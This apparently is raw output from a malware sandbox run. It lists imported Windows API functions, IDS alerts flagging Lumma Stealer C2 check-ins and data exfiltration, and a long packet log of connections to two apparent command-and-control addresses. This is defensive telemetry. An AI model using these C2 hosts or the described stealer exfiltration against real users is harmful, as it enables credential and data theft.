                                                                                                                                                                                                                                                  KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CompareStringW, CreateFileW, CreateThread, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetConsoleWindow, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                                                                                                                                                                  USER32.dllShowWindow
                                                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                  EnglishUnited States
                                                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                  2024-12-27T23:47:27.879814+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973423.55.153.106443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:47:28.679355+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.44973423.55.153.106443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:47:30.304703+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:47:31.062522+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449735104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:47:31.062522+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449735104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:47:32.346762+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:47:33.123035+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449736104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:47:33.123035+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449736104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:47:35.367774+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:47:36.327711+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449737104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:47:37.730606+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:47:40.040652+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:47:42.651807+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:47:45.213010+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:47:45.224331+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449743104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:47:49.425230+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449747104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:47:50.180498+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449747104.21.66.86443TCP
                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:26.436948061 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:26.436978102 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:26.437053919 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:26.440550089 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:26.440560102 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:27.879749060 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:27.879813910 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:27.884560108 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:27.884567976 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:27.884774923 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:27.931633949 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:27.941705942 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:27.983329058 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.679384947 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.679413080 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.679446936 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.679466009 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.679476023 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.679481983 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.679500103 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.679503918 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.679526091 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.679552078 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.848757029 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.848809958 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.848853111 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.848860979 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.848906040 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.874054909 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.874093056 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.874125004 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.874125004 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.874171019 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.886580944 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.886598110 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.886612892 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:28.886619091 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:29.073426008 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:29.073462963 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:29.073529959 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:29.073776007 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:29.073786974 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:30.304641008 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:30.304702997 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:30.307197094 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:30.307208061 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:30.307411909 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:30.308506012 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:30.308533907 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:30.308566093 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:31.062527895 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:31.062618971 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:31.062760115 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:31.062824011 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:31.062844992 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:31.062858105 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:31.062863111 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:31.088115931 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:31.088150978 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:31.088247061 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:31.088507891 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:31.088515043 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:32.346508026 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:32.346761942 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:32.348295927 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:32.348301888 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:32.348491907 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:32.349955082 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:32.349993944 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:32.350047112 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.123061895 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.123106956 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.123140097 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.123174906 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.123186111 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.123193979 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.123260975 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.123266935 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.123305082 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.130810022 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.137491941 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.137540102 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.137546062 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.181627989 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.181636095 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.228502035 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.242578030 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.246680975 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.246737957 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.246743917 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.290994883 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.322706938 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.326383114 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.326446056 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.326484919 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.326544046 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.336797953 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.336810112 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.336819887 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:33.336823940 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:34.039030075 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:34.039134979 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:34.039238930 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:34.039617062 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:34.039649010 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:35.367670059 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:35.367774010 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:35.369349003 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:35.369376898 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:35.369605064 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:35.370830059 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:35.371032953 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:35.371083021 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:35.371146917 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:35.371160984 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:36.327707052 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:36.327795029 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:36.327881098 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:36.397313118 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:36.397368908 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:36.472244024 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:36.472291946 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:36.472367048 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:36.472616911 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:36.472625971 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:37.730397940 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:37.730606079 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:37.731825113 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:37.731831074 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:37.732043028 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:37.733314037 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:37.733418941 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:37.733438015 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:38.602670908 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:38.602777958 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:38.602931976 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:38.602963924 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:38.602982044 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:38.777642965 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:38.777754068 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:38.777844906 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:38.778117895 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:38.778172970 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:40.040551901 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:40.040652037 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:40.042543888 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:40.042567015 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:40.042824984 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:40.044294119 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:40.044507027 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:40.044559956 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:40.044635057 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:40.044651985 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:41.008384943 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:41.008476019 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:41.008727074 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:41.008843899 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:41.008882999 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:41.392714977 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:41.392745972 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:41.392827988 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:41.393178940 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:41.393191099 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:42.651720047 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:42.651807070 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:42.653032064 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:42.653042078 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:42.653352976 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:42.655412912 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:42.658384085 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:42.658389091 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:43.430974960 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:43.431128979 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:43.431190968 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:43.431277990 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:43.431296110 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:43.948561907 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:43.948581934 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:43.948668003 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:43.948930979 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:43.948941946 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.212923050 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.213010073 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.214047909 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.214059114 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.214307070 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.223155022 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.223916054 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.223948956 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.224104881 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.224128008 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.224217892 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.224244118 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.224986076 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.224998951 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.225172043 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.225183010 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.225311995 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.225326061 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.225336075 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.225461960 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.225498915 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.271336079 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.271506071 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.271553993 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.271565914 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.315359116 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.319416046 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.319463968 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.319492102 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.363360882 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.367525101 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.367554903 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.411375046 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:45.584777117 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:48.068761110 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:48.068850040 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:48.068912029 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:48.069176912 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:48.069191933 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:48.164958000 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:47:48.164999008 CET44349747104.21.66.86192.168.2.4
